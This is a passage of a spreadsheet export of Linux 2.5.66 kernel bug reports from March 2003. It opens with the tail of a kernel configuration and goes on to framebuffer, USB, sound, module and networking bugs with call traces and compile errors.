CONFIG_NTFS_FS is not set # # Pseudo filesystems # CONFIG_PROC_FS=y # CONFIG_DEVFS_FS is not set CONFIG_DEVPTS_FS=y CONFIG_TMPFS=y CONFIG_RAMFS=y # # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # CONFIG_NFS_FS=m CONFIG_NFS_V3=y # CONFIG_NFS_V4 is not set CONFIG_NFSD=m CONFIG_NFSD_V3=y # CONFIG_NFSD_V4 is not set # CONFIG_NFSD_TCP is not set CONFIG_LOCKD=m CONFIG_LOCKD_V4=y CONFIG_EXPORTFS=m CONFIG_SUNRPC=m # CONFIG_SUNRPC_GSS is not set CONFIG_SMB_FS=m # CONFIG_SMB_NLS_DEFAULT is not set CONFIG_CIFS=m # CONFIG_NCP_FS is not set # CONFIG_CODA_FS is not set # CONFIG_INTERMEZZO_FS is not set # CONFIG_AFS_FS is not set # # Partition Types # CONFIG_PARTITION_ADVANCED=y # CONFIG_ACORN_PARTITION is not set # CONFIG_OSF_PARTITION is not set # CONFIG_AMIGA_PARTITION is not set # CONFIG_ATARI_PARTITION is not set # CONFIG_MAC_PARTITION is not set CONFIG_MSDOS_PARTITION=y # CONFIG_BSD_DISKLABEL is not set # CONFIG_MINIX_SUBPARTITION is not set # CONFIG_SOLARIS_X86_PARTITION is not set # CONFIG_UNIXWARE_DISKLABEL is not set # CONFIG_LDM_PARTITION is not set # CONFIG_NEC98_PARTITION is not set # CONFIG_SGI_PARTITION is not set # CONFIG_ULTRIX_PARTITION is not set # CONFIG_SUN_PARTITION is not set # CONFIG_EFI_PARTITION is not set CONFIG_SMB_NLS=y CONFIG_NLS=y # # Native Language Support # CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=m # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set # CONFIG_NLS_CODEPAGE_850 is not set # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set CONFIG_NLS_ISO8859_1=m # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set # CONFIG_NLS_ISO8859_15 is not set # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set CONFIG_NLS_UTF8=m # # Graphics support # CONFIG_FB=y # CONFIG_FB_CIRRUS is not set # CONFIG_FB_PM2 is not set # CONFIG_FB_CYBER2000 is not set # CONFIG_FB_IMSTT is not set # CONFIG_FB_VGA16 is not set CONFIG_FB_VESA=y CONFIG_VIDEO_SELECT=y # CONFIG_FB_HGA is not set # CONFIG_FB_RIVA is not set # CONFIG_FB_MATROX is not set # CONFIG_FB_RADEON is not set # CONFIG_FB_ATY128 is not set # CONFIG_FB_ATY is not set # CONFIG_FB_SIS is not set # CONFIG_FB_NEOMAGIC is not set # CONFIG_FB_3DFX is not set # CONFIG_FB_VOODOO1 is not set # CONFIG_FB_TRIDENT is not set # CONFIG_FB_PM3 is not set # CONFIG_FB_VIRTUAL is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_MDA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y CONFIG_FRAMEBUFFER_CONSOLE=y CONFIG_PCI_CONSOLE=y # CONFIG_FONTS is not set CONFIG_FONT_8x8=y CONFIG_FONT_8x16=y # # Logo configuration # CONFIG_LOGO=y # CONFIG_LOGO_LINUX_MONO is not set # CONFIG_LOGO_LINUX_VGA16 is not set CONFIG_LOGO_LINUX_CLUT224=y # # Sound # CONFIG_SOUND=m # # Advanced Linux Sound Architecture # CONFIG_SND=m CONFIG_SND_SEQUENCER=m CONFIG_SND_SEQ_DUMMY=m CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=m CONFIG_SND_PCM_OSS=m CONFIG_SND_SEQUENCER_OSS=y # CONFIG_SND_RTCTIMER is not set CONFIG_SND_VERBOSE_PRINTK=y CONFIG_SND_DEBUG=y CONFIG_SND_DEBUG_MEMORY=y CONFIG_SND_DEBUG_DETECT=y # # Generic devices # CONFIG_SND_DUMMY=m CONFIG_SND_VIRMIDI=m # CONFIG_SND_MTPAV is not set CONFIG_SND_SERIAL_U16550=m CONFIG_SND_MPU401=m # # PCI devices # # CONFIG_SND_ALI5451 is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS4281 is not set # CONFIG_SND_EMU10K1 is not set # CONFIG_SND_KORG1212 is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_TRIDENT is not set CONFIG_SND_YMFPCI=m # CONFIG_SND_ALS4000 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_ENS1370 is not set # CONFIG_SND_ENS1371 is not set # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set # CONFIG_SND_INTEL8X0 is not set # CONFIG_SND_SONICVIBES is not set CONFIG_SND_VIA82XX=m # # ALSA USB devices # # CONFIG_SND_USB_AUDIO is not set # # Open Sound System # # CONFIG_SOUND_PRIME is not set # # USB support # CONFIG_USB=m # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # CONFIG_USB_BANDWIDTH is not set # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # CONFIG_USB_EHCI_HCD=m CONFIG_USB_OHCI_HCD=m CONFIG_USB_UHCI_HCD=m # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set # # SCSI support is needed for USB Storage # # # USB Human Interface Devices (HID) # CONFIG_USB_HID=m CONFIG_USB_HIDINPUT=y # CONFIG_HID_FF is not set # CONFIG_USB_HIDDEV is not set # # USB HID Boot Protocol drivers # # CONFIG_USB_KBD is not set # CONFIG_USB_MOUSE is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_XPAD is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_SCANNER is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # # Video4Linux support is needed for USB Multimedia device support # # # USB Network adaptors # # CONFIG_USB_CATC is not set # CONFIG_USB_CDCETHER is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_BRLVGER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_TEST is not set # # Bluetooth support # # CONFIG_BT is not set # # Profiling support # # CONFIG_PROFILING is not set # # Kernel hacking # CONFIG_DEBUG_KERNEL=y CONFIG_DEBUG_STACKOVERFLOW=y CONFIG_DEBUG_SLAB=y CONFIG_DEBUG_IOVIRT=y CONFIG_MAGIC_SYSRQ=y CONFIG_DEBUG_SPINLOCK=y CONFIG_KALLSYMS=y CONFIG_DEBUG_SPINLOCK_SLEEP=y CONFIG_FRAME_POINTER=y # # Security options ## CONFIG_SECURITY is not set # # Cryptographic options # # CONFIG_CRYPTO is not set # # Library routines # # CONFIG_CRC32 is not set CONFIG_ZLIB_INFLATE=y CONFIG_X86_BIOS_REBOOT=y Problem Description: Five minutes after booting up I get an endless stream of the following until I reboot. Mar 25 09:17:36 dad kernel: Debug: sleeping function called from illegal context at mm/slab.c:1723 Mar 25 09:17:36 dad kernel: Call Trace: Mar 25 09:17:36 dad kernel: [&lt;c011d7bf&gt;] __might_sleep+0x4f/0x90 Mar 25 09:17:36 dad kernel: [&lt;c0149611&gt;] kmalloc+0x1a1/0x1c0 Mar 25 09:17:36 dad kernel: [&lt;c0233a45&gt;] accel_cursor+0xd5/0x300 Mar 25 09:17:36 dad kernel: [&lt;c0215976&gt;] e100_get_link_state+0x36/0xa0 Mar 25 09:17:36 dad kernel: [&lt;c0233e65&gt;] fb_vbl_handler+0x85/0xa0 Mar 25 09:17:36 dad kernel: [&lt;e103d9ed&gt;] init_stall_timer+0x6d/0x80 [uhci_hcd] Mar 25 09:17:36 dad kernel: [&lt;e103d813&gt;] stall_callback+0x253/0x3c0 [uhci_hcd] Mar 25 09:17:36 dad kernel: [&lt;c012a9d6&gt;] update_process_times+0x46/0x50 Mar 25 09:17:36 dad kernel: [&lt;c02324c0&gt;] cursor_timer_handler+0x0/0x40 Mar 25 09:17:36 dad kernel: [&lt;c02324e1&gt;] cursor_timer_handler+0x21/0x40 Mar 25 09:17:36 dad kernel: [&lt;c012ab32&gt;] run_timer_softirq+0x132/0x3c0 Mar 25 09:17:36 dad kernel: [&lt;c010bdec&gt;] do_IRQ+0x1fc/0x320 Mar 25 09:17:36 dad kernel: [&lt;c0125de1&gt;] do_softirq+0xa1/0xb0 Mar 25 09:17:36 dad kernel: [&lt;c010bdec&gt;] do_IRQ+0x1fc/0x320 Mar 25 09:17:36 dad kernel: [&lt;c0116c01&gt;] apm_bios_call_simple+0x61/0xa0 Mar 25 09:17:36 dad kernel: [&lt;c0109fdc&gt;] common_interrupt+0x18/0x20 Mar 25 09:17:36 dad kernel: [&lt;c0106fe7&gt;] default_idle+0x27/0x30 Mar 25 09:17:36 dad kernel: [&lt;c0116ef2&gt;] apm_cpu_idle+0xc2/0x150 Mar 25 09:17:36 dad kernel: [&lt;c0116e30&gt;] apm_cpu_idle+0x0/0x150 Mar 25 09:17:36 dad kernel: [&lt;c0106fc0&gt;] default_idle+0x0/0x30 Mar 25 09:17:36 dad kernel: [&lt;c0107061&gt;] cpu_idle+0x31/0x40 Mar 25 09:17:36 dad kernel: [&lt;c0105000&gt;] rest_init+0x0/0x30 Mar 25 09:17:36 dad kernel: Steps to reproduce: make, install, and boot a 2.5.66 kernel with the above configuration. Precisely (within a couple of seconds) after booting, the above appears. This started with the bk archive as of March 22nd about 6 AM CST. It continues through 2.5.66-bk current as of 25 Mar.</t>
  </si>
  <si>
    <t>sleeping function in illegal context</t>
  </si>
  <si>
    <t>2003-03-25 11:23 UTC</t>
  </si>
  <si>
    <t>2003-05-09 01:57 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sarge Hardware Environment: IBM Thinkpad 600 Problem Description: Mar 25 20:09:21 gswi1164 kernel: Call Trace: Mar 25 20:09:21 gswi1164 kernel: [__might_sleep+84/92] __might_sleep+0x54/0x5c Mar 25 20:09:21 gswi1164 kernel: [kmalloc+97/372] kmalloc+0x61/0x174 Mar 25 20:09:21 gswi1164 kernel: [accel_cursor+224/708] accel_cursor+0xe0/0x2c4 Mar 25 20:09:21 gswi1164 kernel: [try_to_wake_up+377/532] try_to_wake_up+0x179/0x214 Mar 25 20:09:21 gswi1164 kernel: [fb_vbl_handler+120/148] fb_vbl_handler+0x78/0x94 Mar 25 20:09:21 gswi1164 kernel: [add_timer+81/136] add_timer+0x51/0x88 Mar 25 20:09:21 gswi1164 kernel: [update_process_times+44/56] update_process_times+0x2c/0x38 Mar 25 20:09:21 gswi1164 kernel: [update_wall_time+14/56] update_wall_time+0xe/0x38 Mar 25 20:09:21 gswi1164 kernel: [cursor_timer_handler+16/44] cursor_timer_handler+0x10/0x2c Mar 25 20:09:21 gswi1164 kernel: [run_timer_softirq+254/312] run_timer_softirq+0xfe/0x138 Mar 25 20:09:21 gswi1164 kernel: [cursor_timer_handler+0/44] cursor_timer_handler+0x0/0x2c Mar 25 20:09:21 gswi1164 kernel: [do_softirq+81/176] do_softirq+0x51/0xb0 Mar 25 20:09:21 gswi1164 kernel: [do_IRQ+276/304] do_IRQ+0x114/0x130 Mar 25 20:09:21 gswi1164 kernel: [default_idle+0/52] default_idle+0x0/0x34 Mar 25 20:09:21 gswi1164 kernel: [default_idle+0/52] default_idle+0x0/0x34 Mar 25 20:09:21 gswi1164 kernel: [common_interrupt+24/32] common_interrupt+0x18/0x20 Mar 25 20:09:21 gswi1164 kernel: [default_idle+0/52] default_idle+0x0/0x34 Mar 25 20:09:21 gswi1164 kernel: [default_idle+0/52] default_idle+0x0/0x34 Mar 25 20:09:21 gswi1164 kernel: [default_idle+38/52] default_idle+0x26/0x34 Mar 25 20:09:21 gswi1164 kernel: [cpu_idle+53/68] cpu_idle+0x35/0x44 Mar 25 20:09:21 gswi1164 kernel: [_stext+0/92] rest_init+0x0/0x5c Mar 25 20:09:21 gswi1164 kernel: [_stext+85/92] rest_init+0x55/0x5c Mar 25 20:09:21 gswi1164 kernel: This is sometimes when I stopped typing for a few seconds.</t>
  </si>
  <si>
    <t>Broken cursor when using neofb</t>
  </si>
  <si>
    <t>2003-03-25 11:27 UTC</t>
  </si>
  <si>
    <t>2003-05-04 07:38 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sarge Hardware Environment: IBM Thinkpad 600 Problem Description: I use neofb, the boot messages are: Mar 25 20:04:58 gswi1164 kernel: neofb: mapped io at c680d000 Mar 25 20:04:58 gswi1164 kernel: Autodetected internal display Mar 25 20:04:58 gswi1164 kernel: Panel is a 1024x768 color TFT display Mar 25 20:04:58 gswi1164 kernel: neofb: mapped framebuffer at c6a0e000 Mar 25 20:04:58 gswi1164 kernel: neofb v0.4.1: 2048kB VRAM, using 1024x768, 48.361kHz, 60Hz Mar 25 20:04:58 gswi1164 kernel: fb0: MagicGraph 128XD frame buffer device Mar 25 20:04:58 gswi1164 kernel: Console: switching to colour frame buffer device 128x48 On a vc the line cursor looks like ****** ** ******** instead of ****************** (the normally continous line is broken). Emacs uses a block cursor that is broken similar, the block is broken by two vertical bars.</t>
  </si>
  <si>
    <t>Framebuffer Console corrupted</t>
  </si>
  <si>
    <t>2003-03-26 06:44 UTC</t>
  </si>
  <si>
    <t>Smart</t>
  </si>
  <si>
    <t>2004-06-28 03:05 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 8.0 Hardware Environment: Dell Latitude C640, Ati Radeon Mobility M7 LW Software Environment: Kernel/Textconsole Problem Description: options set to "yes": CONFIG_FB, CONFIG_FB_RADEON, CONFIG_FRAMEBUFFER_CONSOLE, CONFIG_LOGO_LINUX_CLUT224 gives a corrupted output, the guess that it's due to unmatching resolution between FB and GraphicsCard is strengthened by the fact that switching into X for a short moment shows two small textconsoles side by side (odd/pair line console halves probably). Steps to reproduce: ...</t>
  </si>
  <si>
    <t>2.5.66-bk2</t>
  </si>
  <si>
    <t>clean-up: unneeded version.h in sound drivers</t>
  </si>
  <si>
    <t>2003-03-26 07:57 UTC</t>
  </si>
  <si>
    <t>2003-04-10 08:28 UTC</t>
  </si>
  <si>
    <t>Problem Description: There appear to be quite a few files in the 2.5.66-bk2 tree, in the sound driver area, that #include &lt;linux/version.h&gt;, but do not use any of the three things defined in it. linux/sound/oss/cs46xx.c linux/sound/oss/emu10k1/audio.c linux/sound/oss/emu10k1/passthrough.c linux/sound/oss/emu10k1/mixer.c linux/sound/oss/emu10k1/main.c linux/sound/oss/emu10k1/midi.c linux/sound/oss/cs4281/cs4281m.c linux/sound/oss/esssolo1.c linux/sound/oss/ac97_codec.c linux/sound/oss/ite8172.c linux/sound/oss/btaudio.c linux/sound/oss/sonicvibes.c linux/sound/oss/cmpci.c linux/sound/oss/msnd_pinnacle.c linux/sound/oss/nec_vrc5477.c linux/sound/oss/es1371.c linux/sound/oss/i810_audio.c linux/sound/oss/trident.c linux/sound/oss/maestro.c linux/sound/oss/es1370.c linux/sound/core/wrappers.c linux/sound/core/memory_wrapper.c linux/sound/core/sgbuf.c Because of this, if the kernel version changes, but nothing else is modified, these file would be forced needless to recompile due to version.h changing. Would a patch to remove these unnessary includes be accepted?</t>
  </si>
  <si>
    <t>CS4232, CS4236 drivers do not compile</t>
  </si>
  <si>
    <t>2003-03-26 09:51 UTC</t>
  </si>
  <si>
    <t>Pavel R</t>
  </si>
  <si>
    <t>2003-05-04 07:47 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 8.0 Hardware Environment: pentium 2 Software Environment: Problem Description: CS4232 and CS4236 sound drivers fail to compile due to missing members in isapnp_dev structure. Steps to reproduce: Select CS4232 or CS4236+ drivers to compile.</t>
  </si>
  <si>
    <t>typo in ipmi_devintf.c causes kernel compile to fail</t>
  </si>
  <si>
    <t>2003-03-26 10:27 UTC</t>
  </si>
  <si>
    <t>Frank Smith</t>
  </si>
  <si>
    <t>2003-04-15 08:05 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: intel x86 Software Environment: Problem Description: drivers/char/ipmi/ipmi_devintf.c:452 'snprinf' should be 'snprintf' Steps to reproduce: enable ipmi support and try to build kernel. Adding the missing 't' fixes the problem</t>
  </si>
  <si>
    <t>USB storage doesn't work on my Sony Vaio C1VE</t>
  </si>
  <si>
    <t>2003-03-27 02:09 UTC</t>
  </si>
  <si>
    <t>Stelian Pop</t>
  </si>
  <si>
    <t>2003-06-23 08:03 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 8.0 Hardware Environment: Sony Vaio C1VE (same as C1VM/C1VN in other countries), external USB floppy drive, internal memory stick USB reader Software Environment: mount... Problem Description: Neither the floppy drive nor the memory stick reader work, even if they seem to trigger different bugs First of all, both the floppy drive and the memory stick reader work perfectly under a 2.4 kernel. When used with 2.5.66, the memory stick reader is seen as a USB device, but not always detected as a SCSI disk. The floppy drive is immediately recognized as a USB device and a SCSI disk. However, trying to read/write data (with dd, mount etc) doesn't work, errors are shown in the kernel logs and the operations are _very_ slow (the mount process hangs for 5 minutes before giving up, it's wchan being scsi_wait_req). I'm attaching several kernel logs: * memstick.ok, floppy.ok: kernel logs of successful operations on a 2.4.21-pre6 kernel * memstick.bad, floppy.bad: kernel logs of failure on 2.5.66-bk2 * usbstorage.oops: an oops I got while playing with 2.5.66-bk2 and tried to remove usb-storage to see if it helps to reinsert it. I'm attaching it here, and not in a separate bug report because it may be related to my failures. I can give more information if it is needed (enable debugging in USB and/or SCSI somewhere, test patches etc.), just say it. Stelian.</t>
  </si>
  <si>
    <t>CONFIG_PREEMPT / Invalid module format / version magic</t>
  </si>
  <si>
    <t>2003-03-27 06:56 UTC</t>
  </si>
  <si>
    <t>2003-05-22 12:35 UTC</t>
  </si>
  <si>
    <t>Distribution: redHat 8.0 Hardware Environment: Dell Latitude C640 Software Environment: Kernel/Modules Problem Description: Don't know the background... Activating CONFIG_PREEMPT seems to either not be supported in modules or their version magic name/identifier is set wrong. According to /var/log/messages: "2.5.66 PENTIUM4..." should be "2.5.66 preempt PENTIUM4...". modprobe 3c59x with CONFIG_PREEMPT gives "Invalid module format", without it loads fine. Same goes for many other modules. Steps to reproduce: Compile Kernel with CONFIG_PREEMPT, CONFIG_MODULES and some modules. Try to modprobe modules.</t>
  </si>
  <si>
    <t>Wacom driver doesn't work...</t>
  </si>
  <si>
    <t>2003-03-27 11:01 UTC</t>
  </si>
  <si>
    <t>Simon Ask Ulsnes</t>
  </si>
  <si>
    <t>2004-12-02 10:48 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4r2 Hardware Environment: Athlon 650 Mhz / 256 MB RAM Software Environment: XFree86 4.3.0 / KDE Problem Description: I can't figure out how to make the Wacom tablet driver work with my Wacom Graphire2 tablet under linux 2.5.66. It works fine with the latest 2.2 kernel. I can see in the X-logs that the device used (/dev/input/event1) is the correct one ("Wacom Graphire2 4x5" something), the tablet just doesn't respond - no errors at all. I can make it work in a limited way with the standard "mouse" driver (/dev/input/mice). I have, of course, tried to feed /dev/input/mice to the wacom driver (in XF86Config, that is), to no avail (Device Name=Unknown, according to the logs, and no response). Since everything works perfectly on 2.2, I'd suggest this would be a problem with the wacom.ko-driver. Please excuse me if this is my bad and I have just overseen something...</t>
  </si>
  <si>
    <t>Oops in mga_vm_shm_close during X shutdown</t>
  </si>
  <si>
    <t>2003-03-27 12:11 UTC</t>
  </si>
  <si>
    <t>2003-05-05 16:30 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: VIA VT8366 &amp; VT8233, Matrox MGAG550 AGP Software Environment: Linux foo 2.5.66 #1 Tue Mar 25 08:03:24 GMT 2003 i686 unknown unknown GNU/Linux Gnu C 3.2.3 Gnu make 3.80 util-linux 2.11z mount 2.11z module-init-tools 0.9.10 e2fsprogs 1.32 jfsutils 1.1.1 PPP 2.4.1 Linux C Library 2.3.1 Dynamic linker (ldd) 2.3.1 Procps 3.1.6 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 4.5.10 Modules Loaded nls_iso8859_1 loop parport_pc lp parport snd_pcm_oss snd_mixer_oss snd_ens1371 snd_rawmidi snd_pcm snd_page_alloc snd_timer snd_ac97_codec snd iptable_mangle iptable_filter ipt_MASQUERADE ip_nat_ftp iptable_nat ip_conntrack_ftp ip_conntrack 8139too natsemi crc32 uhci_hcd usbcore raid1 es1371 ac97_codec XFree86 Version 4.2.1.1 (Debian 4.2.1-6) Problem Description: Oops when X is shut down Steps to reproduce: Log into X, log out. Crash somewhere while X shuts down / restarts. Killing X by hand causes no crash. Running ksymoops on this complains Warning (Oops_read): Code line not seen, dumping what data is available and gives less information. There is only 1 AGP device, despite the agpgart messages below. -------------- agpgart: Putting AGP V2 device at 00:00.0 into 4x mode agpgart: Putting AGP V2 device at 01:00.0 into 4x mode agpgart: Putting AGP V2 device at 00:00.0 into 4x mode agpgart: Putting AGP V2 device at 01:00.0 into 4x mode printing eip: c02123bb Oops: 0000 [#1] CPU: 0 EIP: 0060:[mga_vm_shm_close+107/480] Not tainted EFLAGS: 00013286 EIP is at mga_vm_shm_close+0x6b/0x1e0 eax: 00000002 ebx: ff400f12 ecx: da2f8bc0 edx: ff231417 esi: 00000001 edi: d96e5a00 ebp: d8cedbe8 esp: d8cedbbc ds: 007b es: 007b ss: 0068 Process XFree86 (pid: 965, threadinfo=d8cec000 task=d95f8c80) Stack: d70e8dc0 0000000c 00000006 c013b92a d96e5d00 dfe5a01c d96e5a00 dfe5a000 d794a500 d794a400 d8cec000 d8cedc1c c013ffcd d794a500 d794a3c0 00000300 00000000 ffffffff d8cedc0c c03881ac 000006db d7347c40 d7347c40 db150200 Call Trace: [clear_page_tables+170/176] clear_page_tables+0xaa/0xb0 [exit_mmap+365/400] exit_mmap+0x16d/0x190 [mmput+85/176] mmput+0x55/0xb0 [exec_mmap+190/320] exec_mmap+0xbe/0x140 [flush_old_exec+26/2096] flush_old_exec+0x1a/0x830 [kernel_read+74/96] kernel_read+0x4a/0x60 [load_elf_binary+737/3104] load_elf_binary+0x2e1/0xc20 [file_read_actor+0/272] file_read_actor+0x0/0x110 [do_IRQ+264/304] do_IRQ+0x108/0x130 [load_elf_binary+0/3104] load_elf_binary+0x0/0xc20 [search_binary_handler+188/688] search_binary_handler+0xbc/0x2b0 [do_execve+386/464] do_execve+0x182/0x1d0 [sys_execve+77/128] sys_execve+0x4d/0x80 [syscall_call+7/11] syscall_call+0x7/0xb Code: 39 7a 3c 0f 44 f0 3b 55 08 0f 84 ff 00 00 00 89 4d e4 85 db</t>
  </si>
  <si>
    <t>Removing wireless card triggers might_sleep warnings.</t>
  </si>
  <si>
    <t>2003-03-28 17:25 UTC</t>
  </si>
  <si>
    <t>2003-04-09 14:31 UTC</t>
  </si>
  <si>
    <t>Dominik Brodowski</t>
  </si>
  <si>
    <t>orinoco_lock() called with hw_unavailable (dev=cf899800) orinoco_lock() called with hw_unavailable (dev=cf899800) orinoco_lock() called with hw_unavailable (dev=cf899800) Debug: sleeping function called from illegal context at include/linux/rwsem.h:43 Call Trace: [&lt;c01212d5&gt;] __might_sleep+0x55/0x60 [&lt;d08488d8&gt;] +0x14/0x93 [ds] [&lt;d084857a&gt;] get_socket_info_by_nr+0x1a/0xb0 [ds] [&lt;d08488d8&gt;] +0x14/0x93 [ds] [&lt;d08473d0&gt;] handle_removal+0x0/0x30 [ds] [&lt;d08473dd&gt;] handle_removal+0xd/0x30 [ds] [&lt;c012eadd&gt;] run_timer_softirq+0x14d/0x3b0 [&lt;c0129d73&gt;] do_softirq+0xb3/0xc0 [&lt;c010cd95&gt;] do_IRQ+0x215/0x310 [&lt;c0107280&gt;] default_idle+0x0/0x50 [&lt;c0105000&gt;] _stext+0x0/0xe0 [&lt;c010af68&gt;] common_interrupt+0x18/0x20 [&lt;c0107280&gt;] default_idle+0x0/0x50 [&lt;c0105000&gt;] _stext+0x0/0xe0 [&lt;c01072a7&gt;] default_idle+0x27/0x50 [&lt;c010734a&gt;] cpu_idle+0x2a/0x40 orinoco_lock() called with hw_unavailable (dev=cf899800)</t>
  </si>
  <si>
    <t>Can't compile 2.5.66 w/i810fb support</t>
  </si>
  <si>
    <t>2003-03-28 18:49 UTC</t>
  </si>
  <si>
    <t>Travis Masoner</t>
  </si>
  <si>
    <t>2003-05-12 09:21 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: P-III/Celeron Software Environment: Problem Description: Kernel won't compile with i810 frame buffer support enabled Steps to reproduce: Enable Frame Buffer Support -&gt; Intel i810/815 support Results from make bzImage : make -f scripts/Makefile.build obj=arch/i386/lib GEN .version CHK include/linux/compile.h UPD include/linux/compile.h gcc -Wp,-MD,init/.version.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict- prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe - mpreferred-stack-boundary=2 -march=pentium3 -Iinclude/asm-i386/mach-default - fomit-frame-pointer -nostdinc -iwithprefix include - DKBUILD_BASENAME=version -DKBUILD_MODNAME=version -c -o init/version.o init/version.c ld -m elf_i386 -r -o init/built-in.o init/main.o init/version.o init/mounts.o init/initramfs.o ld -m elf_i386 -T arch/i386/vmlinux.lds.s arch/i386/kernel/head.o arch/i386/kernel/init_task.o init/built-in.o --start-group usr/built-in.o arch/i386/kernel/built-in.o arch/i386/mm/built-in.o arch/i386/mach- default/built-in.o kernel/built-in.o mm/built-in.o fs/built-in.o ipc/built- in.o security/built-in.o crypto/built-in.o lib/lib.a arch/i386/lib/lib.a drivers/built-in.o sound/built-in.o arch/i386/pci/built-in.o net/built-in.o - -end-group -o vmlinux drivers/built-in.o(.text+0x99032): In function `i810fb_imageblit': : undefined reference to `__memcpy' make: *** [vmlinux] Error 1</t>
  </si>
  <si>
    <t>unregister_netdevice: waiting for eth0 to become free. Usage count = 0</t>
  </si>
  <si>
    <t>2003-03-29 08:55 UTC</t>
  </si>
  <si>
    <t>2003-08-25 08:39 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sarge Hardware Environment: IBM Thinkpad 600, PCMCIA card with pcnet_cs driver Problem Description: I get the message when shutting down. When removing the card, usage count is 2. This earlier message may be related: __ipv6_regen_rndid(): too short regeneration interval; timer diabled for eth0. Steps to reproduce: shutdown with "init 0" or remove the card when configured.</t>
  </si>
  <si>
    <t>setkey -DP hangs system</t>
  </si>
  <si>
    <t>2003-03-29 16:21 UTC</t>
  </si>
  <si>
    <t>2003-03-30 03:12 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: Dual Athlon MP on Tyan S2460, 3c905c net card Software Environment: Uptodate debian/sid, ipsec-tool-0.2.2 Problem Description: System hangs (maybe oops?) on doing a setkey -DP Steps to reproduce: Both hangs have come when doing a setkey -DP I'm just trying to figure out the 2.5.x ipsec stuff. Doing setkey -DP after setting a pair of spd's seems OK, but then I run racoon (foreground with -F and a few -v's) and ping a destination. This gives an error about not being able to setup the sa, so I kil racoon; repeat and tweak a few times, then do the setkey -DP and it dies.</t>
  </si>
  <si>
    <t>Kernel can't reboot or power-down system</t>
  </si>
  <si>
    <t>2.5.66-mm1</t>
  </si>
  <si>
    <t>2003-03-30 12:52 UTC</t>
  </si>
  <si>
    <t>Duraid Madina</t>
  </si>
  <si>
    <t>2003-04-29 16:48 UTC</t>
  </si>
  <si>
